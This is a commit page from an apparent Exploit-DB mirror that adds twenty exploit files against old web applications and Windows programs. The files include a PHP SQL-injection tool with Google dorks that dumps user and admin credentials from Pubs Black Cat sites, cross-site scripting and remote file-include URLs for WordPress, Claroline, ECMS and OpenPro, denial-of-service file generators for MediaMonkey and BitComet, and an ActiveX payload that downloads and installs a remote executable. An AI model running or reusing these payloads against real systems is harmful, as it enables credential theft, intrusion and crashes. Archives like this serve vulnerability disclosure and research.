bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 03_06_2014

Browse source
This commit is contained in:
Offensive Security 2014-03-06 04:29:52 +00:00
parent ade88c80c7
commit 58e6a9f5be
20 changed files with 363 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

75
platforms/php/webapps/32051.php Executable file
View file

@ -0,0 +1,75 @@
source: http://www.securityfocus.com/bid/30221/info
Pubs Black Cat [The Fun] is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
<?php
/*
Coded By RMx
Yuhhu Pubs Black Cat Remote SQL Injection Exploit
Coderx.Org & Biyosecurity.com
Thanx : Liz0zim - Otistiq
Script Demo & Sales :
http://www.iamilkay.net/index.php/scriptler/arkadaslikscriptleri/yuhhuscript/6-yuhhuserisi/8-pubs
Dork --> inurl: browse.groups.php
Dork 2 --> inurl:browse.events.php
Dork 3 --> browse.music.php
Dork 4 --> browse.groups.php
*/
set_time_limit(0);
error_reporting(0);
echo "
<title>Yuhhu Pubs Exploit [ Coded By RMx ]</title>
<form action='' method=post>
USERS EXPLOIT :<br>
?rnek :http://www.example.com<br>
<input type=text name='site'>
<input type=submit value=RMx>
</form>";
if (isset($_POST['site']))
{
$site=$_POST['site'];
$hacker="browse.groups.php?category=-1+union+select+1,2,3,concat(0x656D61696C3A20,email,0x206B756C6C616E6963693A20,username,0x2073696672653A20,password),5,6,7,8,9+from+joovili_users";
$curl = curl_init();
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_URL, $site."/".$hacker);
curl_setopt($curl, CURLOPT_USERAGENT, 'Googlebot/2.1
(+http://www.google.com/bot.html)');
curl_setopt($curl, CURLOPT_REFERER, 'http://www.google.com');
$html = curl_exec($curl);
curl_close($curl);
preg_match_all('#<td class=\"text_4_css_bold\">(.*)<\/td>#',$html,$huseyin);
foreach ($huseyin[1] as $biyosecurity)
{
echo $biyosecurity ."<br>";
}
}
echo "
<form action='' method=post>
ADMIN EXPLOIT :<br>
?rnek :http://www.example.com<br>
<input type=text name='admin'>
<input type=submit value=RMx>
</form>";
if (isset($_POST['admin']))
{
$site=$_POST['admin'];
$hacker="browse.groups.php?category=-1+union+select+1,2,3,concat(0x206B756C6C616E6963693A20,admin_username,0x2073696672653A20,admin_password),5,6,7,8,9+from+joovili_admins";
$curl = curl_init();
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_URL, $site."/".$hacker);
curl_setopt($curl, CURLOPT_USERAGENT, 'Googlebot/2.1
(+http://www.google.com/bot.html)');
curl_setopt($curl, CURLOPT_REFERER, 'http://www.google.com');
$html = curl_exec($curl);
curl_close($curl);
preg_match_all('#<td class=\"text_4_css_bold\">(.*)<\/td>#',$html,$huseyin);
foreach ($huseyin[1] as $biyosecurity)
{
echo $biyosecurity ."<br>";
}
}
?>

10
platforms/php/webapps/32053.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30238/info
WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to WordPress 2.6 are vulnerable.
http://www.example.com/wp/wp-admin/press-this.php/?ajax=video&amp;s=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/wp/wp-admin/press-this.php/?ajax=thickbox&amp;i=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

10
platforms/php/webapps/32057.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30262/info
ECMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
ECMS 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/path/ecms/eprint.php?DOCUMENT_ROOT=shell.txt?
http://www.example.com/path/ecms/index.php?DOCUMENT_ROOT=shell.txt?

9
platforms/php/webapps/32058.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30264/info
OpenPro is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
OpenPro 1.3.1 is vulnerable; other versions may also be affected.
http://www.example.com/path/search_wA.php?LIBPATH=[Evil]

12
platforms/php/webapps/32059.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/30269/info
Claroline is prone to multiple input-validation vulnerabilities:
1. Multiple cross-site scripting vulnerabilities.
2. A remote URI-redirection vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and redirect users to an attacker-controlled site; this may aid in phishing-style attacks.
Versions prior to Claroline 1.8.10 are vulnerable.
http://www.example.com/claroline/announcements/announcements.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>

12
platforms/php/webapps/32060.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/30269/info
Claroline is prone to multiple input-validation vulnerabilities:
1. Multiple cross-site scripting vulnerabilities.
2. A remote URI-redirection vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and redirect users to an attacker-controlled site; this may aid in phishing-style attacks.
Versions prior to Claroline 1.8.10 are vulnerable.
http://www.example.com/claroline/calendar/agenda.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>

12
platforms/php/webapps/32061.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/30269/info
Claroline is prone to multiple input-validation vulnerabilities:
1. Multiple cross-site scripting vulnerabilities.
2. A remote URI-redirection vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and redirect users to an attacker-controlled site; this may aid in phishing-style attacks.
Versions prior to Claroline 1.8.10 are vulnerable.
http://www.example.com/claroline/course/index.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>

12
platforms/php/webapps/32062.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/30269/info
Claroline is prone to multiple input-validation vulnerabilities:
1. Multiple cross-site scripting vulnerabilities.
2. A remote URI-redirection vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and redirect users to an attacker-controlled site; this may aid in phishing-style attacks.
Versions prior to Claroline 1.8.10 are vulnerable.
http://www.example.com/claroline/course_description/index.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>

12
platforms/php/webapps/32063.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/30269/info
Claroline is prone to multiple input-validation vulnerabilities:
1. Multiple cross-site scripting vulnerabilities.
2. A remote URI-redirection vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and redirect users to an attacker-controlled site; this may aid in phishing-style attacks.
Versions prior to Claroline 1.8.10 are vulnerable.
http://www.example.com/claroline/document/document.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>

12
platforms/php/webapps/32064.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/30269/info
Claroline is prone to multiple input-validation vulnerabilities:
1. Multiple cross-site scripting vulnerabilities.
2. A remote URI-redirection vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and redirect users to an attacker-controlled site; this may aid in phishing-style attacks.
Versions prior to Claroline 1.8.10 are vulnerable.
http://www.example.com/claroline/exercise/exercise.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>

12
platforms/php/webapps/32065.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/30269/info
Claroline is prone to multiple input-validation vulnerabilities:
1. Multiple cross-site scripting vulnerabilities.
2. A remote URI-redirection vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and redirect users to an attacker-controlled site; this may aid in phishing-style attacks.
Versions prior to Claroline 1.8.10 are vulnerable.
http://www.example.com/claroline/group/group_space.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>

12
platforms/php/webapps/32066.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/30269/info
Claroline is prone to multiple input-validation vulnerabilities:
1. Multiple cross-site scripting vulnerabilities.
2. A remote URI-redirection vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and redirect users to an attacker-controlled site; this may aid in phishing-style attacks.
Versions prior to Claroline 1.8.10 are vulnerable.
http://www.example.com/claroline/phpbb/newtopic.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>

12
platforms/php/webapps/32067.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/30269/info
Claroline is prone to multiple input-validation vulnerabilities:
1. Multiple cross-site scripting vulnerabilities.
2. A remote URI-redirection vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and redirect users to an attacker-controlled site; this may aid in phishing-style attacks.
Versions prior to Claroline 1.8.10 are vulnerable.
http://www.example.com/claroline/phpbb/reply.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>

12
platforms/php/webapps/32068.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/30269/info
Claroline is prone to multiple input-validation vulnerabilities:
1. Multiple cross-site scripting vulnerabilities.
2. A remote URI-redirection vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and redirect users to an attacker-controlled site; this may aid in phishing-style attacks.
Versions prior to Claroline 1.8.10 are vulnerable.
http://www.example.com/claroline/phpbb/viewtopic.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>

12
platforms/php/webapps/32069.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/30269/info
Claroline is prone to multiple input-validation vulnerabilities:
1. Multiple cross-site scripting vulnerabilities.
2. A remote URI-redirection vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and redirect users to an attacker-controlled site; this may aid in phishing-style attacks.
Versions prior to Claroline 1.8.10 are vulnerable.
http://www.example.com/claroline/wiki/wiki.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>

12
platforms/php/webapps/32070.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/30269/info
Claroline is prone to multiple input-validation vulnerabilities:
1. Multiple cross-site scripting vulnerabilities.
2. A remote URI-redirection vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and redirect users to an attacker-controlled site; this may aid in phishing-style attacks.
Versions prior to Claroline 1.8.10 are vulnerable.
http://www.example.com/claroline/work/work.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>

12
platforms/php/webapps/32071.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/30269/info
Claroline is prone to multiple input-validation vulnerabilities:
1. Multiple cross-site scripting vulnerabilities.
2. A remote URI-redirection vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and redirect users to an attacker-controlled site; this may aid in phishing-style attacks.
Versions prior to Claroline 1.8.10 are vulnerable.
http://www.example.com/[installdir]/claroline/redirector.php?url=http://www.example2.com

57
platforms/windows/dos/32054.py Executable file
View file

@ -0,0 +1,57 @@
source: http://www.securityfocus.com/bid/30251/info
MediaMonkey is prone to two denial-of-service vulnerabilities because it fails to handle user-supplied input.
An attacker can exploit these issues to crash the application. Given the nature of these vulnerabilities, the attacker may also be able to execute arbitrary code, but this has not been confirmed.
MediaMonkey 3.0.3 is vulnerable; other versions may also be affected.
#!/usr/bin/python
# MediaMonkey 3.0.3 [.m3u] & [.pcast] url handling DOS
#This script will generate 2 files called evil.m3u and evil.pcast.
#In both cases the vulnerability resides in failure to handle overly long urls.
#[.m3u descr]
#The vulnerability exists in several places within the url.In this case
#we are going to use the file name part of the url.
#Open evil.m3u in MediaMonkey then play it.Or double click the .m3u file
#and it will try to play automatically.
#Debugger output on crash:
# ----------------------------------------------------------------
# Exception C0000005 (ACCESS_VIOLATION reading [31F518F0])
# ----------------------------------------------------------------
# EAX=FFFFFFFF: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EBX=00000002: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# ECX=0CF203D9: 2F 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41
# EDX=0CF203D9: 2F 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41
# ESP=0CC5AF38: 31 32 37 2E 30 2E 30 2E-31 2F 41 41 41 41 41 41
# EBP=0CCBFF7C: B4 FF CB 0C 18 63 54 03-B8 49 55 03 08 3F 5B 03
# ESI=25031517: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDI=0CCBFF5D: 03 F2 0C D9 03 F2 0C 26-00 00 00 48 00 F1 0C 78
# EIP=035445A8: 8A 14 0E 8D 04 0E 80 FA-2F 0F 84 13 01 00 00 80
# --> MOV DL,[ESI+ECX*1]
# ----------------------------------------------------------------
#
#[.pcast descr]
#Just as in the .m3u case the vulnerability manifests in several places within
#the url.In this case we will use the filename too.
#Double click or "open with" evil.pcast in MediaMonkey.The program will
#start consuming 100% cpu thus becaming unusable.
#
#Found by: Shinnok raydenxy [at] yahoo dot com
m3u = 'http://127.0.0.1/'
badstr = 'A' * 200000
m3u += badstr
m3u += '.mp3'
f = open('evil.m3u','wb')
f.write(m3u);
f.close
pcast = '<?xml version="1.0" encoding="UTF-8"?>\n<pcast version="1.0">\n<channel>\n<link rel="feed" type="application/rss+xml" href="http://127.0.0.1/'
badstr = 'A'* 200000
pcast += badstr
pcast += '.xml"/></link>\n</channel>\n</pcast>\n'
f = open('evil.pcast','wb')
f.write(pcast);
f.close

39
platforms/windows/dos/32056.py Executable file
View file

@ -0,0 +1,39 @@
source: http://www.securityfocus.com/bid/30255/info
BitComet is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to crash the application. Given the nature of this vulnerability, the attacker may also be able to execute arbitrary code, but this has not been confirmed.
BitComet 1.02 is vulnerable; other versions may also be affected.
#!/usr/bin/python
# BitComet 1.02 [HTTP/FTP Batch Download] url DOS
#This python script will generate an evil_batch.txt file that when
#loaded into bitcomet for batch downloading it will result in a crash.
#The vulnerability resides in failure to handle overly long urls.
#(File->HTTP/FTP Batch Download->Import URL from file->OK)
#Debug output:
# ----------------------------------------------------------------
# Exception C00000FD (STACK_OVERFLOW)
# ----------------------------------------------------------------
# EAX=00032000: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
# EBX=06E90020: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
# ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDX=7C90EB94: C3 8D A4 24 00 00 00 00-8D 64 24 00 90 90 90 90
# ESP=0012B354: 66 9A 80 7C 5C 85 57 00-5C F9 B1 00 00 F0 5F 01
# EBP=0012B380: 04 B4 12 00 83 8B 57 00-20 00 E9 06 50 00 00 00
# ESI=015FF000: 14 CB 99 00 E4 05 00 00-06 00 00 00 3F 00 00 00
# EDI=001E8482: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
# EIP=00707E07: 85 00 EB E9 55 8B EC 51-53 56 8B F0 33 DB 3B F3
# --> TEST [EAX],EAX
# ----------------------------------------------------------------
#
#
#Found by: Shinnok raydenxy [at] yahoo dot com
batch = 'http://'
badstr = 'A' * 1000000
batch += badstr
f = open('evil_batch.txt','wb')
f.write(batch);
f.close

7
platforms/windows/remote/32052.html Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30223/info
Sina DLoader is prone to a vulnerability that can cause malicious files to be downloaded and saved to arbitrary locations on an affected computer.
Attackers may exploit this issue to overwrite sensitive files with malicious data that will compromise the affected computer. Other attacks are possible.
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT> <SCRIPT> var YEtYcJsR1="http://example.com/infected.exe"; install["DownloadAndInstall"](YEtYcJsR1); </SCRIPT>